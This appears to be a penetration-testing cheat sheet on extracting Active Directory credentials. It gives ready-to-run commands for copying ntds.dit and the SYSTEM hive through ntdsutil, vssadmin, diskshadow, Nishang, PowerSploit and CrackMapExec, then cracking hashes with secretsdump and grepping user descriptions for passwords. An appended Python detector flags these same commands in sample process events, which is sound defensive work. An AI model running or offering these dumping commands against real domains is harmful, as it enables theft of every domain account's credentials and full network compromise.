Hash Extraction & Domain Credential Dumping
Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
Using ntdsutil
C:\> ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit
Or, as a one-liner:
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
Using VShadow (takes a snapshot of a disk so you can read files that are normally locked while in use)
- Requires local admin / SYSTEM
vssadmin create shadow /for=C:
copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
(Shadow_Copy_Volume_Name is the shadow copy volume name printed by vssadmin; the SYSTEM hive is also needed to decrypt the hashes, see the secretsdump command below)
You can also use the Nishang script, available at: https://github.com/samratashok/nishang
Import-Module .\Copy-VSS.ps1
Copy-VSS
Copy-VSS -DestinationDir C:\ShadowCopy\
Using VSSAdmin
vssadmin create shadow /for=C:
(the HarddiskVolumeShadowCopyN device name is printed in the vssadmin output; N=1 below is an example)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
Extract hashes from ntds.dit
secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
Metasploit can also do this
windows/gather/credentials/domain_hashdump
PowerSploit module
Invoke-NinjaCopy -Path c:\windows\NTDS\ntds.dit -Verbose -LocalDestination c:\ntds.dit
DiskShadow (A Windows Signed Binary)
diskshadow.txt contains:
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset
NOTE - diskshadow.exe must be executed from C:\Windows\System32
diskshadow.exe /s c:\diskshadow.txt
dir c:\exfil
reg.exe save hklm\system c:\exfil\system.bak
Alternatives - modules
CrackMapExec module
cme smb 10.10.0.202 -u username -p password --ntds vss
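Detection angle for the techniques above, as an added example that is not part of the original notes: a small matcher run over constructed process-creation events (Windows Security 4688 / Sysmon Event ID 1 style, field names and hosts are assumptions) that flags the ntdsutil IFM export, vssadmin/diskshadow shadow creation, ntds.dit copies from a shadow device, SYSTEM hive export and Invoke-NinjaCopy.

```python
import re

# Patterns for the NTDS.dit collection techniques listed on this page,
# matched against the command line of a process-creation event.
NTDS_RULES = {
    "ntdsutil IFM export":      re.compile(r"ntdsutil.*(\bifm\b|ac\s+i\s+ntds)", re.I),
    "vssadmin shadow creation": re.compile(r"vssadmin\b.*create\s+shadow", re.I),
    "diskshadow scripted run":  re.compile(r"diskshadow(\.exe)?\s+/s\b", re.I),
    "ntds.dit read via shadow": re.compile(r"HarddiskVolumeShadowCopy\d+\\.*ntds\.dit", re.I),
    "SYSTEM hive export":       re.compile(r"reg(\.exe)?\s+save\s+hklm\\system\b", re.I),
    "NinjaCopy of ntds.dit":    re.compile(r"Invoke-NinjaCopy.*ntds\.dit", re.I),
}

def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in NTDS_RULES.items() if rx.search(cmdline)]

def scan_events(events):
    """Yield (event, rule names) for every event that matches at least one rule."""
    for ev in events:
        hits = classify(ev["CommandLine"])
        if hits:
            yield ev, hits

# Constructed sample events (not real telemetry): host, user and command line.
SAMPLE_EVENTS = [
    {"Host": "DC01", "User": "CORP\\svc_backup", "CommandLine": r'ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q'},
    {"Host": "DC01", "User": "CORP\\svc_backup", "CommandLine": r"vssadmin create shadow /for=C:"},
    {"Host": "DC01", "User": "CORP\\svc_backup", "CommandLine": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy"},
    {"Host": "DC01", "User": "CORP\\svc_backup", "CommandLine": r"diskshadow.exe /s c:\diskshadow.txt"},
    {"Host": "DC01", "User": "CORP\\svc_backup", "CommandLine": r"reg.exe save hklm\system c:\exfil\system.bak"},
    {"Host": "DC01", "User": "CORP\\svc_backup", "CommandLine": r"powershell -c Invoke-NinjaCopy -Path c:\windows\NTDS\ntds.dit -LocalDestination c:\ntds.dit"},
    {"Host": "WS07", "User": "CORP\\alice", "CommandLine": r"vssadmin list shadows"},  # benign: matches nothing
]

if __name__ == "__main__":
    for ev, hits in scan_events(SAMPLE_EVENTS):
        print(f"{ev['Host']} {ev['User']}: {', '.join(hits)} <- {ev['CommandLine']}")
```

Shadow creation and registry saves also occur in legitimate backup jobs, so the matches are triage signals to correlate with the account, the host (domain controllers) and the other rules firing in the same window, not a verdict on their own.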
Password in AD User comment
enum4linux -a <target-ip> | grep -i desc
There are 3-4 fields that seem to be common in most AD schemas:
UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.